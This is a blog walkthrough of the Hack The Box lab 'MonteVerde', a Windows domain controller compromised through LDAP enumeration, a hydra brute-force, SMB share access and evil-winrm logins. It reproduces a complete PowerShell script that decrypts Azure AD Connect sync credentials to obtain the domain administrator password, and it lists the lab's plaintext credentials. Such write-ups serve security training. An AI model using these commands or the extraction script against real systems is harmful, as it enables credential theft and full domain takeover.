MonteVerde.htb

MonteVerde.htb

This is a detailed walk-thru for monteverde.htb written by dR1PPy

One of those rare boxes that I was able to get quick success with getting both User and Root flags.
While there are tons of services open this is a standard Windows Domain controller type of takedown.

Overall this was a great host for emulating what is commonly seen on real world windows networks in many companies today.

Enumeration

As always we start with a port scan and basic enumeration steps.

Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
10.10.10.172  53     tcp    domain        open   
10.10.10.172  88     tcp    kerberos-sec  open   Microsoft Windows Kerberos server time: 2020-01-15 02:04:03Z
10.10.10.172  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.172  389    tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.172  445    tcp    microsoft-ds  open   
10.10.10.172  464    tcp    kpasswd5      open   
10.10.10.172  593    tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.172  636    tcp    tcpwrapped    open   
10.10.10.172  3268   tcp    ldap          open   Microsoft Windows Active Directory LDAP Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.172  3269   tcp    tcpwrapped    open   
10.10.10.172  5985   tcp    http          open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.10.10.172  9389   tcp    mc-nmf        open   .NET Message Framing
10.10.10.172  49667  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49669  tcp    ncacn_http    open   Microsoft Windows RPC over HTTP 1.0
10.10.10.172  49670  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49673  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49702  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.172  49771  tcp    msrpc         open   Microsoft Windows RPC

During our SMB Enumeration we find some interesting items.

########## Enumerating domains ##########

name:[MEGABANK] idx:[0x0]
name:[Builtin] idx:[0x0]


########## Enumerating users ##########

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

So looks like we are part of a Domain, maybe we can query the LDAP service to tell us more information?
We can use the windapsearch tool to help extract all the domain info.

python windapsearch.py -d MEGABANK --dc-ip 10.10.10.172 -U --full -G -C
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+]    Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+]    ...success! Binded as: 
[+]     None

[+] Enumerating all AD groups
[+]    Found 48 groups: 

...

[+] Enumerating all AD users
[+]    Found 10 users: 

...

[+] Enumerating all AD computers
[+]    Found 1 computers: 

...

[*] Bye!

Gaining User Access

We use the complete output to get ourselves a good list of domain users to try some simple brute force attacks.

grep "sAMAccountName" windapsearch.txt | awk '{print $2}' > usernames.txt

We start a brute force attack to find weak passwords, using standard password lists reveal false positive for NULL passwords for all accounts.
To validate this we modify our hydra command a bit

hydra -L usernames.txt ldap2://10.10.10.172 -e nsr

This attack gives us a pair of user credentials

[389][ldap2] host: 10.10.10.172   login: SABatchJobs   password: SABatchJobs

Now its just a matter of moving thru the resources available.
We find we can use this login to access the shared folders.
The most interesting share being the users$ folder

smbclient -L 10.10.10.172 -U SABatchJobs
Unable to initialize messaging context
Enter WORKGROUP\SABatchJobs's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      

We access this share and find one file of interest.

smbclient "\\\\10.10.10.172\\users$" -U SABatchJobs 
Unable to initialize messaging context
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 06:12:48 2020
  ..                                  D        0  Fri Jan  3 06:12:48 2020
  dgalanos                            D        0  Fri Jan  3 06:12:30 2020
  mhope                               D        0  Fri Jan  3 06:41:18 2020
  roleary                             D        0  Fri Jan  3 06:10:30 2020
  smorgan                             D        0  Fri Jan  3 06:10:24 2020

        524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (5.4 KiloBytes/sec) (average 5.4 KiloBytes/sec)

We parse thru the file and find another password.

cat azure.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>

We assume this password belongs to mhope since we found this in his user folder.
We fire up some Evil-WinRM to validate this.

evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>

From here we can quickly grab the User token from the Desktop.

Privilege Escalation

During standard enumeration one of the items we noted was the huge amount of services, users, groups, and resources setup for Azure.
So we spend some more time enumerating this and we find a possible attack vector.

From the following article we find we may be able to extract AD credentials from the Azure AD Connect sync services

https://blog.xpnsec.com/azuread-connect-for-redteam/

We take the POC code from the article and make some minor modifications to call from the proper Object Type

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.ConnectionString="trusted_connection=true;"
$client.open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM ADSync.dbo.mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM ADSync.dbo.mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

We copy this over to our target and run it to extract some credentials.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File ad_sync_extract.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Resources:

Python Script to Enumerate Objects from an AD LDAP service
https://github.com/ropnop/windapsearch

Azure AD Connect for Red Teams
https://blog.xpnsec.com/azuread-connect-for-redteam/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: